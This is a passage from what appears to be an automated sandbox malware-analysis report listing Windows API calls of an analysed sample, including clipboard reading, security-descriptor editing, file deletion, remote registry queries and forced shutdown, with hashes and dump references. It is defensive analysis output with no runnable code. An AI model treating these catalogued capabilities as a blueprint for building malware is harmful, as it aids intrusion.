                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00231A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,002314E7,?,?,?), ref: 00231A82
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00231A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00231A99
                                                                                                                                                                                                                                                                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00231518
                                                                                                                                                                                                                                                                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0023154C
                                                                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 00231563
                                                                                                                                                                                                                                                                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 0023159D
                                                                                                                                                                                                                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 002315B9
                                                                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 002315D0
                                                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000008), ref: 002315D8
                                                                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 002315DF
                                                                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00231600
                                                                                                                                                                                                                                                                                                                            • CopySid.ADVAPI32(00000000), ref: 00231607
                                                                                                                                                                                                                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00231636
                                                                                                                                                                                                                                                                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00231658
                                                                                                                                                                                                                                                                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0023166A
                                                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00231691
                                                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00231698
                                                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002316A1
                                                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 002316A8
                                                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002316B1
                                                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 002316B8
                                                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 002316C4
                                                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 002316CB
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00231ADF: GetProcessHeap.KERNEL32(00000008,002314FD,?,00000000,?,002314FD,?), ref: 00231AED
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00231ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,002314FD,?), ref: 00231AF4
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00231ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,002314FD,?), ref: 00231B03
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 46d5928b1c5903757c23442f0321b979f939e1abace12158f23bc28a2498a942
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 4edcc9075cb6ba5cec3ae3f2ccd0e0efa627f80b0cb4793907c1a000f785def1
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 46d5928b1c5903757c23442f0321b979f939e1abace12158f23bc28a2498a942
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6C717CB2A1020AABDF10DFA5EC49FAEBBBCBF04340F088515E915E7191D7719925CFA0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • OpenClipboard.USER32(0026DCD0), ref: 0024F586
                                                                                                                                                                                                                                                                                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 0024F594
                                                                                                                                                                                                                                                                                                                            • GetClipboardData.USER32(0000000D), ref: 0024F5A0
                                                                                                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 0024F5AC
                                                                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0024F5E4
                                                                                                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 0024F5EE
                                                                                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0024F619
                                                                                                                                                                                                                                                                                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 0024F626
                                                                                                                                                                                                                                                                                                                            • GetClipboardData.USER32(00000001), ref: 0024F62E
                                                                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0024F63F
                                                                                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0024F67F
                                                                                                                                                                                                                                                                                                                            • IsClipboardFormatAvailable.USER32(0000000F), ref: 0024F695
                                                                                                                                                                                                                                                                                                                            • GetClipboardData.USER32(0000000F), ref: 0024F6A1
                                                                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0024F6B2
                                                                                                                                                                                                                                                                                                                            • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0024F6D4
                                                                                                                                                                                                                                                                                                                            • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0024F6F1
                                                                                                                                                                                                                                                                                                                            • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0024F72F
                                                                                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0024F750
                                                                                                                                                                                                                                                                                                                            • CountClipboardFormats.USER32 ref: 0024F771
                                                                                                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 0024F7B6
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 420908878-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 1b7a8ded0fc9ec3b7df958a92ba7be67bb9b779f7813221c4bc0cbbd12cdd189
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 0588d6c720119af4022c091b0909ef268de27aa6a47fd7ee7b1e3f4c0b988ec2
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1b7a8ded0fc9ec3b7df958a92ba7be67bb9b779f7813221c4bc0cbbd12cdd189
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2D61D5316143069FD304EF20E988F6AB7A8EF94704F14856EF856872E2DB71DD45CB61
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00247403
                                                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00247457
                                                                                                                                                                                                                                                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00247493
                                                                                                                                                                                                                                                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 002474BA
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001DB329: _wcslen.LIBCMT ref: 001DB333
                                                                                                                                                                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 002474F7
                                                                                                                                                                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00247524
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                                                                                                                                                                                                                            • API String ID: 3830820486-3289030164
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 0cd38852c66df291f9dd6fd9996d9695f0245b683fff0c6934d71dc4ce84f4e0
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 6f56076d4e41f189c0b48d00ec9fc016b3ff4f80d19c07db5a591800428cac4d
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0cd38852c66df291f9dd6fd9996d9695f0245b683fff0c6934d71dc4ce84f4e0
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AED16E72508344AEC314EF65C895EAFB7ECAF98704F40491EF985C7292EB74DA44CB62
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0024A0A8
                                                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 0024A0E6
                                                                                                                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 0024A100
                                                                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0024A118
                                                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0024A123
                                                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 0024A13F
                                                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0024A18F
                                                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(00297B94), ref: 0024A1AD
                                                                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0024A1B7
                                                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0024A1C4
                                                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0024A1D4
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                                                                                                                                                                            • API String ID: 1409584000-438819550
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 589f07bb7a3d8eaf3112f6c0e92241d177a9d6297226bd2f0da0ea4577edbc57
                                                                                                                                                                                                                                                                                                                            • Instruction ID: b762f143945532d030fe0aa13a9ef3e077927025e26a6c3bf9b8074a3c61b3ff
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 589f07bb7a3d8eaf3112f6c0e92241d177a9d6297226bd2f0da0ea4577edbc57
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1E312732A5021E6BDF14AFB4EC4DADE73AC9F09320F004095F91DE3090EBB0DE608A61
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00244785
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 002447B2
                                                                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 002447E2
                                                                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00244803
                                                                                                                                                                                                                                                                                                                            • RemoveDirectoryW.KERNEL32(?), ref: 00244813
                                                                                                                                                                                                                                                                                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0024489A
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 002448A5
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 002448B0
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: :$\$\??\%s
                                                                                                                                                                                                                                                                                                                            • API String ID: 1149970189-3457252023
                                                                                                                                                                                                                                                                                                                            • Opcode ID: e069adacda57099a748bfd4407f912a513870c1c2f46f1067e0e50c9a064f592
                                                                                                                                                                                                                                                                                                                            • Instruction ID: be1ac7e48d2feaaa34240286ffdc2302f4b249a7364c2c04544c00473fcf5594
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e069adacda57099a748bfd4407f912a513870c1c2f46f1067e0e50c9a064f592
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9631C775A1014EABDB219FA0DC49FEF37BCEF89740F1041B6FA09D6160E7B096548B24
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0024A203
                                                                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0024A25E
                                                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0024A269
                                                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 0024A285
                                                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0024A2D5
                                                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(00297B94), ref: 0024A2F3
                                                                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0024A2FD
                                                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0024A30A
                                                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0024A31A
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0023E399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0023E3B4
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                                                                                                                                                                            • API String ID: 2640511053-438819550
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 8af5b182d5e7d907b2ae3883ea44bdf6fb0111b282bf1a886b4d933d897bbdaf
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 88d97bc2c041dc714b44d54e8916f28b4ea3b3e0f0480d569eaf51c599c516ae
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8af5b182d5e7d907b2ae3883ea44bdf6fb0111b282bf1a886b4d933d897bbdaf
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 15311232A5021E6ACF14EFA4EC09ADE77ACAF45324F104191F910A31A0EBB1DEA59A55
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0025D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0025C10E,?,?), ref: 0025D415
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0025D3F8: _wcslen.LIBCMT ref: 0025D451
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0025D3F8: _wcslen.LIBCMT ref: 0025D4C8
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0025D3F8: _wcslen.LIBCMT ref: 0025D4FE
                                                                                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0025C99E
                                                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 0025CA09
                                                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0025CA2D
                                                                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0025CA8C
                                                                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0025CB47
                                                                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0025CBB4
                                                                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0025CC49
                                                                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 0025CC9A
                                                                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0025CD43
                                                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0025CDE2
                                                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0025CDEF
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3102970594-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 47802a12095933dbcedd11ffe96e0453f48b98071b5ef79a5697e51112bdb107
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 67c4b117151f4efe481556c47fce10fdf3a67283b703c39018a5df453996db73
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 47802a12095933dbcedd11ffe96e0453f48b98071b5ef79a5697e51112bdb107
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CA023B71614301AFC714DF28C895E2ABBF5EF49314F1884ADE84ACB2A2DB31ED56CB51
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001D55D1,?,?,00214B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 001D5871
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0023EAB0: GetFileAttributesW.KERNEL32(?,0023D840), ref: 0023EAB1
                                                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0023D9CD
                                                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0023DA88
                                                                                                                                                                                                                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 0023DA9B
                                                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 0023DAB8
                                                                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0023DAE2
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0023DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0023DAC7,?,?), ref: 0023DB5D
                                                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000,?,?,?), ref: 0023DAFE
                                                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0023DB0F
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                                                                                                                                                                                                                            • String ID: \*.*
                                                                                                                                                                                                                                                                                                                            • API String ID: 1946585618-1173974218
                                                                                                                                                                                                                                                                                                                            • Opcode ID: f32052f8e1ed6bb8eb1e3e7cdf393065d78a07a6924edb2e3ec6cb5b6065715d
                                                                                                                                                                                                                                                                                                                            • Instruction ID: ef1f5e85e747a75312ffeb23f0f86f2439edb190b441b5846a33982feff026f5
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f32052f8e1ed6bb8eb1e3e7cdf393065d78a07a6924edb2e3ec6cb5b6065715d
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 27614D7191510DAECF05EFE0EA929EDB7B6AF24304F6440A6E402B7291EB716F19CB50
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1737998785-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 792bf47aa24850b35395df1709d51e78753a12925f3bee83d4cc55199816cada
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 200d0447865b6aad00b173e95a426557af4df5cf8e768db1fca5ef1e6cc3e4ee
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 792bf47aa24850b35395df1709d51e78753a12925f3bee83d4cc55199816cada
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ED419D31A14602AFD714DF15E98CB16BBE4EF94318F14C4A9E8198F7A2CB75EC42CB90
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00232010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0023205A
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00232010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00232087
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00232010: GetLastError.KERNEL32 ref: 00232097
                                                                                                                                                                                                                                                                                                                            • ExitWindowsEx.USER32(?,00000000), ref: 0023F249
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                                                                                                                                                                            • String ID: $ $@$SeShutdownPrivilege
                                                                                                                                                                                                                                                                                                                            • API String ID: 2234035333-3163812486
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 488fdb90e189cb6859726f0151edc30b45b8709817810c60acdc63fcbb26b4d1
                                                                                                                                                                                                                                                                                                                            • Instruction ID: cfa84bce6dde5ad1d00286822be583d5b9ebaaf2b2997e5288a2b113ac69da16
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 488fdb90e189cb6859726f0151edc30b45b8709817810c60acdc63fcbb26b4d1
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D60149FAF30215ABEB5826B8BECAFBF726C9B08344F144431FD03E21D2D5A08C249590
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,?), ref: 001D233E
                                                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(0000000F), ref: 001D2421
                                                                                                                                                                                                                                                                                                                            • SetBkColor.GDI32(?,00000000), ref: 001D2434
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Color$Proc
                                                                                                                                                                                                                                                                                                                            • String ID: (*
